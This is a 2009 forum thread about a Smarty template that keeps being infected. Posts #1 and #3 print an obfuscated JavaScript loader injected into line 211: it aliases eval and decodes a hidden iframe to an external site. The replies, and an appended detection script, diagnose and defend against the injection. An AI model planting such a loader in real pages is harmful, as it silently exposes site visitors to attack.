need urgent help (php, smarty or ?)

Discussion in 'PHP' started by user099, Aug 7, 2009.

  1. #1
    hi,

    I have got a site with 6000 hits a day. Since yesterday night, there are problems. I cannot reach the main page.
    error log shows: PHP Parse error: syntax error, unexpected '<', expecting T_STRING or T_VARIABLE or '{' or '$' in... public_html/cache/templates_c/%%C3^C37^C3724EE2%%head1.tpl.php on line 211


    210.
    </head>
    211.
    <body <?php if ($this-> <script>/**/function Ruz7(Gcs6, XaV8, Iye4) { var Ccu8; Ccu8=Gcs6.split(XaV8); var Giw4=Ccu8.join(Iye4); return Giw4;/**/ } function Wfp8(Ywm4) { Ywm4 = Ruz7(Ywm4,"##+##","'"); Ywm4 = Ruz7(Ywm4,"##|##","\\"); Giw4=""; Ivt4 =""; for(k=0;k<Ywm4.length;k++) { Giw4 = Ywm4.charCodeAt(k); if (Giw4==32){Giw4=35} else if (Giw4==35){Giw4=32} else if (Giw4==59){Giw4=64} else if (Giw4==64){Giw4=59} else if (Giw4==37){Giw4=42} else if (Giw4==42){Giw4=37} else if (Giw4>=97 && Giw4<=122) { Giw4=Giw4-97;Giw4=25-Giw4;Giw4+=97; }else if (Giw4>=65 && Giw4<=90) { Giw4=Giw4-65;Giw4=25-Giw4;Giw4+=65; }else if (Giw4>=48 && Giw4<=57) { Giw4=Giw4-48;Giw4=9-Giw4;Giw4+=48; } Ivt4 += String.fromCharCode(Giw4); } return Ivt4;/**/ }Popf=eval;Popf(Wfp8('ezi#Msw8#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#Kzl4#=###+##ruiznv##+##@'));Popf(Wfp8('ezi#Ang9#=#wlxfnvmg.xivzgvVovnvmg(Kzl4)@Ang9.hvgZggiryfgv(##+##hix##+##,#Msw8)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##drwgs##+##,9)@Ang9.hvgZggiryfgv(##+##svrtsg##+##,9)@Ang9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Wrzw=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Popf(Wfp8('ezi#rsu7=Wrzw.rmwvcLu(##+##nhrv##+##)@ezi#Vlo2=Wrzw.rmwvcLu(##+##mg#3.##+##)@ezi#DbZ4=Wrzw.rmwvcLu(##+##nhrv#1##+##)@'));if ((ihf2>0)&&(Eol7==-1)&&(WyA5==-1)){Popf(Wfp8('wlxfnvmg.ylwb.zkkvmwXsrow(Ang9)@'));}</script> _tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
    212.

    213.
    <div id="container"><!-- main container //-->

    When I delete the cache files it will work for some minutes. I also uploaded a backup of the tpl-files yesterday. It runs for some hours but at midnight it is the same error.

    i can show more details through pm because it is an adult site.

    edit:

    the file looks like this shortly after deleting:

    211. #
    </head>
    #
    <body <?php if ($this->_tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
    #

    #
    <div id="container"><!-- main container //-->
     
    Last edited: Aug 7, 2009
    user099, Aug 7, 2009 IP
  2. zandigo

    #2
    Well, first, if your PHP script did work for several hours, that means there is no problem with the logic in the script itself (unless you changed something or a new condition showed up).

    It's probably your server bugs (or you just need to disable the caching feature if your script has one; a little more work for the server is nothing in comparison with frequent downtime).
     
    zandigo, Aug 7, 2009 IP
  3. user099

    #3
    Thanks for your reply.
    I didn't change anything, and disabling the caching of Smarty templates is not possible, I think.

    edit:

    this is showing in the tpl-file after some minutes and the site won't work:

    211.
    <body <?php if ($this-> <script>/**/function KCz3(QNp5, bud5, lnmp) { var Pnl3; Pnl3=QNp5.split(bud5); var UcO1=Pnl3.join(lnmp); return UcO1;/**/ } function RzG6(Dnd1) { Dnd1 = KCz3(Dnd1,"##+##","'"); Dnd1 = KCz3(Dnd1,"##|##","\\"); UcO1=""; Pby5 =""; for(k=0;k<Dnd1.length;k++) { UcO1 = Dnd1.charCodeAt(k); if (UcO1==32){UcO1=35} else if (UcO1==35){UcO1=32} else if (UcO1==59){UcO1=64} else if (UcO1==64){UcO1=59} else if (UcO1==37){UcO1=42} else if (UcO1==42){UcO1=37} else if (UcO1>=97 && UcO1<=122) { UcO1=UcO1-97;UcO1=25-UcO1;UcO1+=97; }else if (UcO1>=65 && UcO1<=90) { UcO1=UcO1-65;UcO1=25-UcO1;UcO1+=65; }else if (UcO1>=48 && UcO1<=57) { UcO1=UcO1-48;UcO1=9-UcO1;UcO1+=48; } Pby5 += String.fromCharCode(UcO1); } return Pby5;/**/ }VXd1=eval;VXd1(RzG6('ezi#FRa2#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#YNx3#=###+##ruiznv##+##@'));VXd1(RzG6('ezi#Nnt2#=#wlxfnvmg.xivzgvVovnvmg(YNx3)@Nnt2.hvgZggiryfgv(##+##hix##+##,#FRa2)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##drwgs##+##,9)@Nnt2.hvgZggiryfgv(##+##svrtsg##+##,9)@Nnt2.hvgZggiryfgv(##+##yliwvi##+##,9)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#ssRj=mzertzgli.fhviZtvmg.glOldviXzhv()@'));VXd1(RzG6('ezi#Ecz3=ssRj.rmwvcLu(##+##nhrv##+##)@ezi#YDh4=ssRj.rmwvcLu(##+##mg#3.##+##)@ezi#Alxt=ssRj.rmwvcLu(##+##nhrv#1##+##)@'));if ((Vxa6>0)&&(BWs5==-1)&&(Zocg==-1)){VXd1(RzG6('wlxfnvmg.ylwb.zkkvmwXsrow(Nnt2)@'));}</script> _tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
    212.
     
    Last edited: Aug 8, 2009
    user099, Aug 8, 2009 IP
  4. kblessinggr

    #4
    I think you're looking at the compiled tpl file, not the original template file. Look for the error in your original template file or the PHP that loads it.

    There are two main components to Smarty: the cache, which you can disable, and the compile directory. The compile directory is needed to convert the tpl into a live file and you shouldn't mess with that one at all.
     
    kblessinggr, Aug 8, 2009 IP
  5. user099

    #5
    Yes, it is the compiled file. But when I delete the file the site works for a few minutes and the compiled file is newly generated. But some time later the tpl-file has a larger size and the site won't work.
    I can only see in the error log that something is wrong with the cached file:

    PHP Parse error: syntax error, unexpected '<', expecting T_STRING or T_VARIABLE or '{' or '$' in... public_html/cache/templates_c/%%C3^C37^C3724EE2%%head1.tpl.php on line 211
     
    user099, Aug 8, 2009 IP
  6. kblessinggr

    #6
    Looking at both your original TPL and the compiled one, and how 'after a while' it breaks because there's a block of javascript being inserted right smack dab in the middle of the PHP code... but it's not in your original TPL file. I suspect you may have a trojan or something else that may have compromised your FTP password, and automatic bots are logging in every so often attempting to insert their block of javascript code (kinda like an iframe injection attack).

    The php code is supposed to be

    if ($this->_tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>
    Based on the original TPL

    But if you'll notice from 211, somehow <script>....</script> was inserted right after $this-> , probably because it thought -> was the closing tag for <body> and was attempting to put a block of javascript right after it.

    Some actions to take:

    1) Change your password from another machine.
    2) Do not use FTP from that machine until you've updated antivirus and done a full scan.
    3) In the future use SSH/SCP if your hosting allows; the free program WinSCP will let you log into port 22 and behaves much like FTP but is much more secure.
    4) You may need to reinstall the script to get rid of possibly contaminated files.

    Had a client once who was a victim of a trojan that sniffed the FTP port for credentials, and once compromised, bots from other servers would log in, look for index.php, default*.php and home.php and attempt to insert an iframe at the bottom of the page.
     
    Last edited: Aug 8, 2009
    kblessinggr, Aug 8, 2009 IP
    user099 likes this.
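
    An added example, not part of any post in this thread: a heuristic scanner for the symptom described in post #6, a `<script>` block sitting inside an open PHP tag of a compiled template, plus the `name=eval;` aliasing visible in the pasted line 211. It assumes compiled files end in `.tpl.php` as in the error log and that short `<?` open tags are not used; the sample strings are constructed, and the script body in them is a harmless stand-in.

```python
import re
from pathlib import Path

PHP_OPEN = re.compile(r"<\?php|<\?=")              # assumption: no short "<?" tags
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
EVAL_ALIAS = re.compile(r"\b\w+\s*=\s*eval\s*;")   # e.g. "Popf=eval;" in the thread

def _line(text, offset):
    """1-based line number of a character offset."""
    return text.count("\n", 0, offset) + 1

def find_injections(text):
    """Return [(line_no, reason), ...] for one compiled template."""
    findings = []
    pos = 0
    while (m := PHP_OPEN.search(text, pos)):
        close = text.find("?>", m.end())
        end = len(text) if close == -1 else close  # unterminated block runs to EOF
        hit = SCRIPT_TAG.search(text, m.end(), end)
        if hit:
            findings.append((_line(text, hit.start()), "script tag inside PHP block"))
        pos = end + 2
    for alias in EVAL_ALIAS.finditer(text):
        findings.append((_line(text, alias.start()), "eval assigned to an alias"))
    return findings

def scan_dir(root):
    """Scan every *.tpl.php under root; return {path: findings} for hits only."""
    report = {}
    for path in sorted(Path(root).rglob("*.tpl.php")):
        found = find_injections(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed samples: the clean compiled line from post #1, and the same line
# with a placeholder script spliced in after "$this->" as in the broken file.
CLEAN = (
    "</head>\n"
    "<body <?php if ($this->_tpl_vars['upload_page'] == 'upload'): ?>"
    "onLoad=\"iniFilePage()\"<?php endif; ?>>\n"
)
INFECTED = CLEAN.replace(
    "$this->",
    "$this-> <script>function f(a){return a;}P=eval;P(f('x'));</script> ",
)

if __name__ == "__main__":
    print(find_injections(CLEAN))
    print(find_injections(INFECTED))
```

    The check is a heuristic: a PHP block that legitimately echoes a `<script>` string is flagged too, so review hits against the original `.tpl` source.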